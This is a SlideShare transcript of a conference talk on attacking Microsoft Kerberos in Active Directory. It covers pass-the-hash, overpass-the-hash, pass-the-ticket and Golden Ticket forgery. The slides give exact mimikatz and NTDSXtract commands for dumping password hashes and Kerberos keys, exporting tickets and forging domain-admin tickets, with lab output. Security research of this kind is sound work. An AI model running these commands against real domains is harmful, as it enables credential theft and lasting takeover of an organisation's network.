SlideShare une entreprise Scribd logo

Abusing Microsoft Kerberos - Sorry you guys don’t get it

E Hacking
E Hacking
Technologie
1  sur  53
Télécharger pour lire hors ligne
by Alva `Skip` DUCKWALL & Benjamin DELPY Abusing Microsoft Kerberos sorry you guys don’t get it
• Alva `Skip` DUCKWALL @ passingthehash http://passing-the-hash.blogspot.com author of papers about Pass-the-hash & Kerberos Dude in a basement somewhere `whoami` - Skip
• Benjamin DELPY @gentilkiwi https://github.com/gentilkiwi http://blog.gentilkiwi.com author of mimikatz is certainly admin of your domain `whoami` - gentilkiwi
• We’ll speak about: – Windows, Active Directory – mimikatz – NTLM Hash – Kerberos – Pass-the-hash/keys/ticket – Golden Ticket • We’ll try: 3 live demos. – All of that also works from a non domain-joined computer.
Remember about Pass-The-Hash? It still works… despite what the Microsoft KB or Russinovich says
• Normal • Pass-the-Hash A little reminder waza 1234/ NTLM (md4) LM cc36cf7a8514893e fccd332446158b1a d0e9aee149655a60 75e4540af1f22d3b LSASS (msv1_0) NTLM (md4) LM cc36cf7a8514893e fccd332446158b1a LSASS (msv1_0) cc36cf7a8514893e fccd332446158b1a
Cool isn’t it ? And it works like a charm but with NTLM disabled or “Protected Users”?
*or maybe you only don’t want to leave NTLM auth footprints in the Eventlog ;)
• It is all about keys and tickets • For Example, let’s use Administrateur who wants to access cifs on a win81 machine on chocolate.local domain • It needs 3 set of keys, all are in the Active Directory – And by default, derived from password. Kerberos
1. The KDC long-term secret key (domain key) – Under the mysterious krbtgt account (rc4, aes128, aes256, des…) – Needed to sign Microsoft specific data in “PAC”, encrypt TGT 2. The Client long-term secret key (derived from password) – Under the user/computer/server account – Needed to check AS-REQ, encrypt session key 3. The Target/Service long-term secret key (derived from password) – Under the computer/server account – Needed to countersign data in “PAC” of TGS, encrypt TGS Kerberos :: keys
• Normal Kerberos waza 1234/ des_cbc_md5 f8fd987fa7153185 LSASS (kerberos) for « chocolate.local » domain rc4_hmac_nt (NTLM/md4) cc36cf7a8514893e fccd332446158b1a aes128_hmac 8451bb37aa6d7ce3 d2a5c2d24d317af3 aes256_hmac b726836138609031 4acce8d9367e55f5 5865e7ef8e670fbe 4262d6c94098a9e9 KDC KDC TGT TGS ③ TGS-REQ ④ TGS-REP ⑤ Usage Administrateur win81
• The KDC will validate the authentication if it can decrypt the timestamp with the long-term user key (for RC4, the NTLM hash of the user password) • It issues a TGT representing the user in the domain, for a specified period Kerberos :: preauth RID : 000001f4 (500) User : Administrateur * Primary LM : NTLM : cc36cf7a8514893efccd332446158b1a * Kerberos-Newer-Keys Default Salt : CHOCOLATE.LOCALAdministrateur Default Iterations : 4096 Credentials aes256_hmac (4096) : b7268361386090314acce8d9367e55f5 5865e7ef8e670fbe4262d6c94098a9e9 aes128_hmac (4096) : 8451bb37aa6d7ce3d2a5c2d24d317af3 des_cbc_md5 (4096) : f8fd987fa7153185 KDC waza 1234/ rc4_hmac_nt (NTLM/md4) cc36cf7a8514893e fccd332446158b1a 20140807054500Z timestamp ① AS-REQ ② AS-REPTGT
• This TGT is encrypted with a key shared between all KDC – The RC4 key for the krbtgt account : 310b643c5316c8c3c70a10cfb17e2e31 • The KDC adds a Microsoft specific PAC to a structure with user’s information Kerberos :: TGT RID : 000001f6 (502) User : krbtgt * Primary LM : NTLM : 310b643c5316c8c3c70a10cfb17e2e31 * Kerberos-Newer-Keys Default Salt : CHOCOLATE.LOCALkrbtgt Default Iterations : 4096 Credentials aes256_hmac (4096) : 15540cac73e94028231ef86631bc47bd 5c827847ade468d6f6f739eb00c68e42 aes128_hmac (4096) : da3128afc899a298b72d365bd753dbfb des_cbc_md5 (4096) : 620eb39e450e6776 KDC TGT Start/End/MaxRenew: 14/07/2014 00:46:09 ; 14/07/2014 10:46:09 ; 21/07/2014 00:46:09 Service Name (02) : krbtgt ; CHOCOLATE.LOCAL ; @ CHOCOLATE.LOCAL Target Name (02) : krbtgt ; CHOCOLATE ; @ CHOCOLATE.LOCAL Client Name (01) : Administrateur ; @ CHOCOLATE.LOCAL ( CHOCOLATE ) Flags 40e10000 : name_canonicalize ; pre_authent ; initial ; renewable ; forwardable ; Session Key : 0x00000012 - aes256_hmac f3bf2e0e26903703bec6259b400a586f403bbfe3771cb7972be3c 0868cb9cc69 RC4-HMAC – krbtgt 310b643c5316c8c3c70a10cfb17e2e31 Username : Administrateur Domain SID S-1-5-21-130452501-2365100805-3685010670 Authorization data Microsoft (PAC) CHECKSUM_SRV – HMAC_MD5 - krbtgt 310b643c5316c8c3c70a10cfb17e2e3 CHECKSUM_KDC – HMAC_MD5 - krbtgt 310b643c5316c8c3c70a10cfb17e2e3
• The KDC will create a Microsoft specific structure (PAC) with user information • This PAC is signed with the target key, and the KDC key – for a TGT, the target is also the KDC, so it is the same key, 310b643c5316c8c3c70a10cfb17e2e31 for RC4 – KDC keys are in the krbtgt account Kerberos :: TGT :: PAC RID : 000001f6 (502) User : krbtgt * Primary LM : NTLM : 310b643c5316c8c3c70a10cfb17e2e31 * Kerberos-Newer-Keys Default Salt : CHOCOLATE.LOCALkrbtgt Default Iterations : 4096 Credentials aes256_hmac (4096) : 15540cac73e94028231ef86631bc47bd 5c827847ade468d6f6f739eb00c68e42 aes128_hmac (4096) : da3128afc899a298b72d365bd753dbfb des_cbc_md5 (4096) : 620eb39e450e6776 KDC Username : Administrateur Domain SID S-1-5-21-130452501-2365100805-3685010670 User ID 500 Administrateur Groups ID 512 Admins du domaine 519 Administrateurs de l’entreprise 518 Administrateurs du schéma … Authorization data Microsoft (PAC) CHECKSUM_SRV – HMAC_MD5 - krbtgt 310b643c5316c8c3c70a10cfb17e2e3 CHECKSUM_KDC – HMAC_MD5 - krbtgt 310b643c5316c8c3c70a10cfb17e2e3
Kerberos :: KRBTGT RID : 000001f6 (502) User : krbtgt * Primary LM : NTLM : 310b643c5316c8c3c70a10cfb17e2e31 * Kerberos-Newer-Keys Default Salt : CHOCOLATE.LOCALkrbtgt Default Iterations : 4096 Credenti aes256_hmac (4096) : 15540cac73e94028231ef86631bc47bd 5c827847ade468d6f6f739eb00c68e42 aes128_hmac (4096) : da3128afc899a298b72d365bd753dbfb des_cbc_md5 (4096) : 620eb39e450e6776 • KRBTGT account pwd / hash only changes: – Upgrade of domain functional level (NT5->NT6) – Bare metal recovery using restore media – Manually changed (compromise recovery) – In most enterprises this password hasn’t changed in YEARS
• All of that is not secret ! – Tickets are ASN.1 encoded • Use OpenSSL or your favorite tool – Kerberos ticket (and KRB-CRED format) • http://www.ietf.org/rfc/rfc4120.txt – Microsoft Specific PAC • http://msdn.microsoft.com/library/cc237917.aspx Kerberos :: internal
Kerberos Overpass-the-hash
• Overpass-the-Hash or Pass-the-Key ;) Kerberos des_cbc_md5 LSASS (kerberos) for « chocolate.local » domain rc4_hmac_nt (NTLM/md4) cc36cf7a8514893e fccd332446158b1a aes128_hmac aes256_hmac KDC KDC TGT TGS ③ TGS-REQ ④ TGS-REP ⑤ Usage cc36cf7a8514893e fccd332446158b1a
• Overpass-the-Hash or Pass-the-Key ;) not limited to RC4 ! Kerberos des_cbc_md5 LSASS (kerberos) for « chocolate.local » domain rc4_hmac_nt (NTLM/md4) aes128_hmac aes256_hmac KDC KDC TGT TGS ③ TGS-REQ ④ TGS-REP ⑤ Usage b726836138609031 4acce8d9367e55f5 5865e7ef8e670fbe 4262d6c94098a9e9 b726836138609031 4acce8d9367e55f5 5865e7ef8e670fbe 4262d6c94098a9e9
“Ok, Skip, Kiwi, it’s cool… but how can we find these keys?”
• Keys are both in Active Directory and client LSASS memory • We can find: – DES key – RC4 key…. Yep, this is the NTLM hash of the password, no domain salt! • Sorry Microsoft, we don’t get it, but your RFC yes ;) - http://www.ietf.org/rfc/rfc4757.txt – AES128 & AES256 keys (with NT 6) • New “protected users” group prevents Keys in client LSASS memory – Of course not on the DC ;) Kerberos :: Overpass-the-hash
• AES Keys use PBKDF2 – These hashes are salted – 4096 iterations of the PBKDF2 algorithm – Difficult to crack • Of course these hashes are cached in memory on the client side and then used as password equivalents, just like the NT hashes • This is how you fail with strong cryptography Kerberos :: AES Keys
• From Active Directory : Offline – “just” need : ntds.dit & SYSTEM hive – NTDSXtract : http://www.ntdsxtract.com • python dsusers.py ntds.dit.export/datatable.4 ntds.dit.export/link_table.7 ./work --name Administrateur --syshive SYSTEM --supplcreds --passwordhashes --lmoutfile ./lm --ntoutfile ./nt --pwdformat john Kerberos :: Overpass-the-hash User name: Administrateur [...] Password hashes: Administrateur:$NT$cc36cf7a8514893efccd332446158b1a::: Supplemental credentials: Kerberos newer keys salt: CHOCOLATE.LOCALAdministrateur Credentials 18 b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9 17 8451bb37aa6d7ce3d2a5c2d24d317af3 3 f8fd987fa7153185
• From Active Directory : Online Kerberos :: Overpass-the-hash mimikatz # privilege::debug Privilege '20' OK mimikatz # lsadump::lsa /inject /name:Administrateur Domain : CHOCOLATE / S-1-5-21-130452501-2365100805-3685010670 RID : 000001f4 (500) User : Administrateur * Primary LM : NTLM : cc36cf7a8514893efccd332446158b1a [...] * Kerberos-Newer-Keys Default Salt : CHOCOLATE.LOCALAdministrateur Default Iterations : 4096 Credentials aes256_hmac (4096) : b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9 aes128_hmac (4096) : 8451bb37aa6d7ce3d2a5c2d24d317af3 des_cbc_md5 (4096) : f8fd987fa7153185
• From client LSASS memory Kerberos :: Overpass-the-hash mimikatz # privilege::debug Privilege '20' OK mimikatz # sekurlsa::ekeys Authentication Id : 0 ; 1616704 (00000000:0018ab40) Session : Interactive from 2 User Name : Administrateur Domain : CHOCOLATE SID : S-1-5-21-130452501-2365100805-3685010670-500 * Username : Administrateur * Domain : CHOCOLATE.LOCAL * Password : (null) * Key List : aes256_hmac b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9 rc4_hmac_nt cc36cf7a8514893efccd332446158b1a
• Overpass-the-hash ! – mimikatz now supports pass-the-hash for both NTLM & Kerberos provider! Kerberos :: Overpass-the-hash mimikatz # privilege::debug Privilege '20' OK mimikatz # sekurlsa::pth /user:Administrateur /domain:chocolate.local /ntlm:cc36cf7a8514893efccd332446158b1a user : Administrateur domain : chocolate.local program : cmd.exe NTLM : cc36cf7a8514893efccd332446158b1a | PID 2388 | TID 2392 | LUID 0 ; 264419 (00000000:000408e3) _ msv1_0 - data copy @ 00000000003C7BC0 : OK ! _ kerberos - data copy @ 0000000000435988 _ aes256_hmac -> null _ aes128_hmac -> null _ rc4_hmac_nt OK _ rc4_hmac_old OK _ rc4_md4 OK _ rc4_hmac_nt_exp OK _ rc4_hmac_old_exp OK _ *Password replace -> null Old pass-the-hash for NTLM protocol New pass-the-hash for Kerberos protocol
~ demo ! ~
• By the way, this is exactly how Aorato POC works for changing password with just NTLM hash! – They send a Kerberos request to the service : kadmin/changepw • http://www.aorato.com/blog/active-directory-vulnerability- disclosure-weak-encryption-enables-attacker-change-victims- password-without-logged/ Kerberos :: Overpass-the-hash (more…)
Kerberos Pass-the-ticket
• Pass-the-Ticket Kerberos des_cbc_md5 LSASS (kerberos) for « chocolate.local » domain rc4_hmac_nt (NTLM/md4) aes128_hmac aes256_hmac KDC KDC TGT TGS ③ TGS-REQ ④ TGS-REP ⑤ Usage TGT
• Pass-the-Ticket also with TGS! Kerberos des_cbc_md5 LSASS (kerberos) for « chocolate.local » domain rc4_hmac_nt (NTLM/md4) aes128_hmac aes256_hmac KDC KDC TGS ③ TGS-REQ ④ TGS-REP ⑤ Usage TGS
“Ok, Skip, Kiwi, it’s cool… but how can we find these tickets?”
• TGT & TGS are in client LSASS memory – The “normal” way: by API • User can only export their ticket(s) (without privilege) • For TGT: AllowTgtSessionKey registry key must be set for session key export… – (mandatory to use the TGT) • For TGS: no restriction at all! – To get tickets : LsaCallAuthenticationPackage/KerbRetrieveEncodedTicketMessage • In mimikatz: kerberos::list [/export] – To pass-the-ticket : LsaCallAuthenticationPackage/KerbSubmitTicketMessage • In mimikatz: kerberos::ptt ticket.kirbi Not a hack : http://msdn.microsoft.com/library/windows/desktop/aa378099.aspx Kerberos :: TGT & TGS
• Ok, but I want other people’s TGT & TGS ! Why do you want that? Are you a hacker? – Raw memory reading (yep, even with minidump!) – This time with all session keys Kerberos :: TGT & TGS
• In mimikatz : – privilege::debug • (if not already SYSTEM) – sekurlsa::tickets /export • Make your choice ! • Then use it : – kerberos::ptt ticket.kirbi Kerberos :: TGT & TGS
~ demo ! ~
* No encryption check for THE domain administrator (id==500) ! No worry, this account is not sensitive ;) ** Not in memory when user in « Protected Users » group Kerberos :: make your choice Default lifetime Minimum number of KDC accesses Multiple targets Available with Smartcard Realtime check for restrictions (account disabled, logon hours...) Protected Users Check for Encryption * (RC4/AES) Can be found in Is funky Normal 42 days 2 Yes Yes Yes Yes n.a. No Overpass-the-hash (Pass-the-key) 42 days 2 Yes No Yes Yes Active Directory Client Memory ** No (ok, a little;)) Pass-the-Ticket (TGT) 10 hours 1 Yes Yes No (20mn after) No Client Memory Yes Pass-the-Ticket (TGS) 10 hours 0 No Yes No No Client Memory Yes Golden Ticket 10 years 1 Yes Yes No (we can cheat) No n.a. Fuck, Yes!
Kerberos Golden Ticket
• A “Golden Ticket”, is a homemade ticket – It’s done with a lot of love – … and a key • It’s not made by the KDC, so : – it’s not limited by GPO or others settings ;) – you can push whatever you want inside! – it’s smartcard independent (sorry CISO !) Kerberos :: Golden Ticket
• …but a golden ticket is not only about lifetime modification (10 years is hardcoded but can be modified) • Interesting part is about to modify data into, like lifetime, but mainly the Microsoft PAC : – Groups (Domain/Enterprise Admins, by example ;) – SID – Username Kerberos :: Golden Ticket
• Kerberos is STATELESS – All account policy info is in the TGT • Disabled / Expired / outside of logon hours • Password expired • Authentication silo membership • “Protected Users” is just a group membership in the PAC • Group Membership in the PAC – This means that ALL account policy is Client Side Enforcement Kerberos :: AD Account Policy
• Kerberos 5 has no method for the KDC/TGS (server) to validate that an account is still valid when presented with a TGT – Microsoft implemented a solution for this problem – IF the TGT is older than 20 minutes, the KDC will validate the account is still valid / enabled before issuing service tickets • We will come back to this later  Kerberos :: 20 Minute Rule
• Even if the technique remains the same, I’ve made the choice to limit it to TGT (no TGS) – Why ? Because TGT and TGS rely on different keys – target key is renewed periodically, krbtgt… ~never  – A single TGT can obtain many TGS Kerberos :: Golden Ticket Ticket Encryption PAC KDC Signature PAC Server Signature TGT krbtgt krbtgt krbtgt TGS target krbtgt target
• All you need is : – KDC Key (krbtgt), it can be RC4 (NTLM hash) or AES – SID of the domain (whoami, psgetsid, etc.) – Domain name Kerberos :: Golden Ticket mimikatz # lsadump::lsa /inject /name:krbtgt Domain : CHOCOLATE / S-1-5-21-130452501-2365100805-3685010670 * Primary LM : NTLM : 310b643c5316c8c3c70a10cfb17e2e31 * Kerberos-Newer-Keys Default Salt : CHOCOLATE.LOCALkrbtgt Default Iterations : 4096 Credentials aes256_hmac (4096) : 15540cac73e94028231ef86631bc47bd5c827847ade468d6f6f739eb00c68e42 aes128_hmac (4096) : da3128afc899a298b72d365bd753dbfb des_cbc_md5 (4096) : 620eb39e450e6776
• Create your own ! • kerberos::golden /domain:chocolate.local <= domain name /sid:S-1-5-21-130452501-2365100805-3685010670 <= domain SID /rc4:310b643c5316c8c3c70a10cfb17e2e31 <= NTLM hash of krbtgt /user:Administrateur <= username you wanna be /id:500 <= RID of username (500 is THE domain admin) /groups:513,512,520,518,519 <= Groups list of the user (be imaginative) /ticket:Administrateur.kirbi <= the ticket filename Kerberos :: Golden Ticket
• Client name : Administrateur • Service name : krbtgt/chocolate.local • Validity – Start Time 07/08/2014 12:05:00 – End Time 07/08/2024 12:05:00 • … • Authorization data Microsoft (PAC) – Username : Administrateur – Domain SID • S-1-5-21-130452501-2365100805-3685010670 – User ID • 500 Administrateur – Groups ID • 512 Admins du domaine • 519 Administrateurs de l’entreprise • 518 Administrateurs du schéma • … – … Kerberos :: Golden Ticket
• Be crazy =) – We want to have a long time access to a share limited to a user “utilisateur”, disabled. • kerberos::golden /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /aes256:15540cac73e94028231ef86631bc47bd5c827847ade468d6f6f739eb00c68e42 /user:srvcharly$ <= real account always in good state /id:1001 <= RID of the real account /groups:513,1107 <= RID of “utilisateur” account, yep, in groups =) /ticket:fake_utilisateur.kirbi Kerberos :: Golden Ticket
• Be funky =) • kerberos::golden /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /rc4:310b643c5316c8c3c70a10cfb17e2e31 /user:badguy /id:0xffffffff /groups:513,512,520,518,519 /ticket:badguy.kirbi • Yep, both the USER and the ID don’t exist, so this TGT will only work for 20 mins (TGS watchdog) – It works if an ACL is defined with groups (this one spoofs a user in domain admins group; 512) – …but all TGS obtained in this 20 mins will be valid 10h ;) – …and you can make multiple TGT… Kerberos :: Golden Ticket
~ demo ! ~
Sorry, it was the last demo ;)
~ Questions? ~ (if not enough time, come see us!)
• You! To come listen us! – And trying to understand Benjamin ;) – If you are shy : exorcyst{put here @}gmail.com & benjamin{put here @}gentilkiwi.com • My co-speaker - he will recognize himself ;) • Blackhat staff ! • Microsoft – They give us a lot’s of subject for slides! – For a few years, they have worked hard to enhance a lots of things in security (and it’s not easy to mix security with retro compatibility) • Security community (sorry, we have both a big list) – Come see us for beer-time & stickers :P Thank you all !
Abusing Microsoft Kerberos - Sorry you guys don’t get it

Recommandé

NSC #2 - D2 02 - Benjamin Delpy - Mimikatz
NSC #2 - D2 02 - Benjamin Delpy - MimikatzNSC #2 - D2 02 - Benjamin Delpy - Mimikatz
NSC #2 - D2 02 - Benjamin Delpy - MimikatzNoSuchCon
 
Abusing Microsoft Kerberos - Sorry you guys don't get it
Abusing Microsoft Kerberos - Sorry you guys don't get itAbusing Microsoft Kerberos - Sorry you guys don't get it
Abusing Microsoft Kerberos - Sorry you guys don't get itBenjamin Delpy
 
Linux kernel TLS и HTTPS / Александр Крижановский (Tempesta Technologies)
Linux kernel TLS и HTTPS / Александр Крижановский (Tempesta Technologies)Linux kernel TLS и HTTPS / Александр Крижановский (Tempesta Technologies)
Linux kernel TLS и HTTPS / Александр Крижановский (Tempesta Technologies)Ontico
 
Стек Linux HTTPS/TCP/IP для защиты от HTTP-DDoS-атак
Стек Linux HTTPS/TCP/IP для защиты от HTTP-DDoS-атакСтек Linux HTTPS/TCP/IP для защиты от HTTP-DDoS-атак
Стек Linux HTTPS/TCP/IP для защиты от HTTP-DDoS-атакPositive Hack Days
 
Defeating The Network Security Infrastructure V1.0
Defeating The Network Security Infrastructure V1.0Defeating The Network Security Infrastructure V1.0
Defeating The Network Security Infrastructure V1.0Philippe Bogaerts
 
Kerberos, NTLM and LM-Hash
Kerberos, NTLM and LM-HashKerberos, NTLM and LM-Hash
Kerberos, NTLM and LM-HashAnkit Mehta
 
Kubernetes networking - basics
Kubernetes networking - basicsKubernetes networking - basics
Kubernetes networking - basicsJuraj Hantak
 
LXC on Ganeti
LXC on GanetiLXC on Ganeti
LXC on Ganetikawamuray
 

Recommandé

NSC #2 - D2 02 - Benjamin Delpy - Mimikatz
NSC #2 - D2 02 - Benjamin Delpy - MimikatzNSC #2 - D2 02 - Benjamin Delpy - Mimikatz
NSC #2 - D2 02 - Benjamin Delpy - MimikatzNoSuchCon
 
Abusing Microsoft Kerberos - Sorry you guys don't get it
Abusing Microsoft Kerberos - Sorry you guys don't get itAbusing Microsoft Kerberos - Sorry you guys don't get it
Abusing Microsoft Kerberos - Sorry you guys don't get itBenjamin Delpy
 
Linux kernel TLS и HTTPS / Александр Крижановский (Tempesta Technologies)
Linux kernel TLS и HTTPS / Александр Крижановский (Tempesta Technologies)Linux kernel TLS и HTTPS / Александр Крижановский (Tempesta Technologies)
Linux kernel TLS и HTTPS / Александр Крижановский (Tempesta Technologies)Ontico
 
Стек Linux HTTPS/TCP/IP для защиты от HTTP-DDoS-атак
Стек Linux HTTPS/TCP/IP для защиты от HTTP-DDoS-атакСтек Linux HTTPS/TCP/IP для защиты от HTTP-DDoS-атак
Стек Linux HTTPS/TCP/IP для защиты от HTTP-DDoS-атакPositive Hack Days
 
Defeating The Network Security Infrastructure V1.0
Defeating The Network Security Infrastructure V1.0Defeating The Network Security Infrastructure V1.0
Defeating The Network Security Infrastructure V1.0Philippe Bogaerts
 
Kerberos, NTLM and LM-Hash
Kerberos, NTLM and LM-HashKerberos, NTLM and LM-Hash
Kerberos, NTLM and LM-HashAnkit Mehta
 
Kubernetes networking - basics
Kubernetes networking - basicsKubernetes networking - basics
Kubernetes networking - basicsJuraj Hantak
 
LXC on Ganeti
LXC on GanetiLXC on Ganeti
LXC on Ganetikawamuray
 
Мастер-класс "Логическая репликация и Avito" / Константин Евтеев, Михаил Тюр...
Мастер-класс "Логическая репликация и Avito" / Константин Евтеев, Михаил Тюр...Мастер-класс "Логическая репликация и Avito" / Константин Евтеев, Михаил Тюр...
Мастер-класс "Логическая репликация и Avito" / Константин Евтеев, Михаил Тюр...Ontico
 
Corosync and Pacemaker
Corosync and PacemakerCorosync and Pacemaker
Corosync and PacemakerMarian Marinov
 
Troubleshooting containerized triple o deployment
Troubleshooting containerized triple o deploymentTroubleshooting containerized triple o deployment
Troubleshooting containerized triple o deploymentSadique Puthen
 
Install ovs on local pc
Install ovs on local pcInstall ovs on local pc
Install ovs on local pcApplistarVN
 
Linux-HA with Pacemaker
Linux-HA with PacemakerLinux-HA with Pacemaker
Linux-HA with PacemakerKris Buytaert
 
When Crypto Attacks! (Yahoo 2009)
When Crypto Attacks! (Yahoo 2009)When Crypto Attacks! (Yahoo 2009)
When Crypto Attacks! (Yahoo 2009)Nate Lawson
 
How to Troubleshoot OpenStack Without Losing Sleep
How to Troubleshoot OpenStack Without Losing SleepHow to Troubleshoot OpenStack Without Losing Sleep
How to Troubleshoot OpenStack Without Losing SleepSadique Puthen
 
The Art of Grey-Box Attack
The Art of Grey-Box AttackThe Art of Grey-Box Attack
The Art of Grey-Box AttackPrathan Phongthiproek
 
Crypto Strikes Back! (Google 2009)
Crypto Strikes Back! (Google 2009)Crypto Strikes Back! (Google 2009)
Crypto Strikes Back! (Google 2009)Nate Lawson
 
BlueHat v18 || Hardening hyper-v through offensive security research
BlueHat v18 || Hardening hyper-v through offensive security researchBlueHat v18 || Hardening hyper-v through offensive security research
BlueHat v18 || Hardening hyper-v through offensive security researchBlueHat Security Conference
 
MySQL High Availability Sprint: Launch the Pacemaker
MySQL High Availability Sprint: Launch the PacemakerMySQL High Availability Sprint: Launch the Pacemaker
MySQL High Availability Sprint: Launch the Pacemakerhastexo
 
Stuart Larsen, attacking http2implementations-rev1
Stuart Larsen, attacking http2implementations-rev1Stuart Larsen, attacking http2implementations-rev1
Stuart Larsen, attacking http2implementations-rev1PacSecJP
 
Staging driver sins
Staging driver sinsStaging driver sins
Staging driver sinsStephen Hemminger
 
Docker Networking with New Ipvlan and Macvlan Drivers
Docker Networking with New Ipvlan and Macvlan DriversDocker Networking with New Ipvlan and Macvlan Drivers
Docker Networking with New Ipvlan and Macvlan DriversBrent Salisbury
 
Attacking http2 implementations (1)
Attacking http2 implementations (1)Attacking http2 implementations (1)
Attacking http2 implementations (1)John Villamil
 
Anatomy of neutron from the eagle eyes of troubelshoorters
Anatomy of neutron from the eagle eyes of troubelshoortersAnatomy of neutron from the eagle eyes of troubelshoorters
Anatomy of neutron from the eagle eyes of troubelshoortersSadique Puthen
 
Don't dump thread dumps
Don't dump thread dumpsDon't dump thread dumps
Don't dump thread dumpsTier1app
 
Troubleshooting Tips from a Docker Support Engineer
Troubleshooting Tips from a Docker Support EngineerTroubleshooting Tips from a Docker Support Engineer
Troubleshooting Tips from a Docker Support EngineerJeff Anderson
 
Linux Cluster next generation
Linux Cluster next generationLinux Cluster next generation
Linux Cluster next generationsamsolutionsby
 
High Availability With DRBD & Heartbeat
High Availability With DRBD & HeartbeatHigh Availability With DRBD & Heartbeat
High Availability With DRBD & HeartbeatChris Barber
 
Passwords#14 - mimikatz
Passwords#14 - mimikatzPasswords#14 - mimikatz
Passwords#14 - mimikatzBenjamin Delpy
 
Ssh and sshfp dns records v04
Ssh and sshfp dns records v04Ssh and sshfp dns records v04
Ssh and sshfp dns records v04Bob Novas
 

Contenu connexe

Tendances

Мастер-класс "Логическая репликация и Avito" / Константин Евтеев, Михаил Тюр...
Мастер-класс "Логическая репликация и Avito" / Константин Евтеев, Михаил Тюр...Мастер-класс "Логическая репликация и Avito" / Константин Евтеев, Михаил Тюр...
Мастер-класс "Логическая репликация и Avito" / Константин Евтеев, Михаил Тюр...Ontico
 
Corosync and Pacemaker
Corosync and PacemakerCorosync and Pacemaker
Corosync and PacemakerMarian Marinov
 
Troubleshooting containerized triple o deployment
Troubleshooting containerized triple o deploymentTroubleshooting containerized triple o deployment
Troubleshooting containerized triple o deploymentSadique Puthen
 
Install ovs on local pc
Install ovs on local pcInstall ovs on local pc
Install ovs on local pcApplistarVN
 
Linux-HA with Pacemaker
Linux-HA with PacemakerLinux-HA with Pacemaker
Linux-HA with PacemakerKris Buytaert
 
When Crypto Attacks! (Yahoo 2009)
When Crypto Attacks! (Yahoo 2009)When Crypto Attacks! (Yahoo 2009)
When Crypto Attacks! (Yahoo 2009)Nate Lawson
 
How to Troubleshoot OpenStack Without Losing Sleep
How to Troubleshoot OpenStack Without Losing SleepHow to Troubleshoot OpenStack Without Losing Sleep
How to Troubleshoot OpenStack Without Losing SleepSadique Puthen
 
Crypto Strikes Back! (Google 2009)
Crypto Strikes Back! (Google 2009)Crypto Strikes Back! (Google 2009)
Crypto Strikes Back! (Google 2009)Nate Lawson
 
BlueHat v18 || Hardening hyper-v through offensive security research
BlueHat v18 || Hardening hyper-v through offensive security researchBlueHat v18 || Hardening hyper-v through offensive security research
BlueHat v18 || Hardening hyper-v through offensive security researchBlueHat Security Conference
 
MySQL High Availability Sprint: Launch the Pacemaker
MySQL High Availability Sprint: Launch the PacemakerMySQL High Availability Sprint: Launch the Pacemaker
MySQL High Availability Sprint: Launch the Pacemakerhastexo
 
Stuart Larsen, attacking http2implementations-rev1
Stuart Larsen, attacking http2implementations-rev1Stuart Larsen, attacking http2implementations-rev1
Stuart Larsen, attacking http2implementations-rev1PacSecJP
 
Docker Networking with New Ipvlan and Macvlan Drivers
Docker Networking with New Ipvlan and Macvlan DriversDocker Networking with New Ipvlan and Macvlan Drivers
Docker Networking with New Ipvlan and Macvlan DriversBrent Salisbury
 
Attacking http2 implementations (1)
Attacking http2 implementations (1)Attacking http2 implementations (1)
Attacking http2 implementations (1)John Villamil
 
Anatomy of neutron from the eagle eyes of troubelshoorters
Anatomy of neutron from the eagle eyes of troubelshoortersAnatomy of neutron from the eagle eyes of troubelshoorters
Anatomy of neutron from the eagle eyes of troubelshoortersSadique Puthen
 
Don't dump thread dumps
Don't dump thread dumpsDon't dump thread dumps
Don't dump thread dumpsTier1app
 
Troubleshooting Tips from a Docker Support Engineer
Troubleshooting Tips from a Docker Support EngineerTroubleshooting Tips from a Docker Support Engineer
Troubleshooting Tips from a Docker Support EngineerJeff Anderson
 
Linux Cluster next generation
Linux Cluster next generationLinux Cluster next generation
Linux Cluster next generationsamsolutionsby
 
High Availability With DRBD & Heartbeat
High Availability With DRBD & HeartbeatHigh Availability With DRBD & Heartbeat
High Availability With DRBD & HeartbeatChris Barber
 

Tendances (20)

Мастер-класс "Логическая репликация и Avito" / Константин Евтеев, Михаил Тюр...
Мастер-класс "Логическая репликация и Avito" / Константин Евтеев, Михаил Тюр...Мастер-класс "Логическая репликация и Avito" / Константин Евтеев, Михаил Тюр...
Мастер-класс "Логическая репликация и Avito" / Константин Евтеев, Михаил Тюр...
 
Corosync and Pacemaker
Corosync and PacemakerCorosync and Pacemaker
Corosync and Pacemaker
 
Troubleshooting containerized triple o deployment
Troubleshooting containerized triple o deploymentTroubleshooting containerized triple o deployment
Troubleshooting containerized triple o deployment
 
Install ovs on local pc
Install ovs on local pcInstall ovs on local pc
Install ovs on local pc
 
Linux-HA with Pacemaker
Linux-HA with PacemakerLinux-HA with Pacemaker
Linux-HA with Pacemaker
 
When Crypto Attacks! (Yahoo 2009)
When Crypto Attacks! (Yahoo 2009)When Crypto Attacks! (Yahoo 2009)
When Crypto Attacks! (Yahoo 2009)
 
How to Troubleshoot OpenStack Without Losing Sleep
How to Troubleshoot OpenStack Without Losing SleepHow to Troubleshoot OpenStack Without Losing Sleep
How to Troubleshoot OpenStack Without Losing Sleep
 
The Art of Grey-Box Attack
The Art of Grey-Box AttackThe Art of Grey-Box Attack
The Art of Grey-Box Attack
 
Crypto Strikes Back! (Google 2009)
Crypto Strikes Back! (Google 2009)Crypto Strikes Back! (Google 2009)
Crypto Strikes Back! (Google 2009)
 
BlueHat v18 || Hardening hyper-v through offensive security research
BlueHat v18 || Hardening hyper-v through offensive security researchBlueHat v18 || Hardening hyper-v through offensive security research
BlueHat v18 || Hardening hyper-v through offensive security research
 
MySQL High Availability Sprint: Launch the Pacemaker
MySQL High Availability Sprint: Launch the PacemakerMySQL High Availability Sprint: Launch the Pacemaker
MySQL High Availability Sprint: Launch the Pacemaker
 
Stuart Larsen, attacking http2implementations-rev1
Stuart Larsen, attacking http2implementations-rev1Stuart Larsen, attacking http2implementations-rev1
Stuart Larsen, attacking http2implementations-rev1
 
Staging driver sins
Staging driver sinsStaging driver sins
Staging driver sins
 
Docker Networking with New Ipvlan and Macvlan Drivers
Docker Networking with New Ipvlan and Macvlan DriversDocker Networking with New Ipvlan and Macvlan Drivers
Docker Networking with New Ipvlan and Macvlan Drivers
 
Attacking http2 implementations (1)
Attacking http2 implementations (1)Attacking http2 implementations (1)
Attacking http2 implementations (1)
 
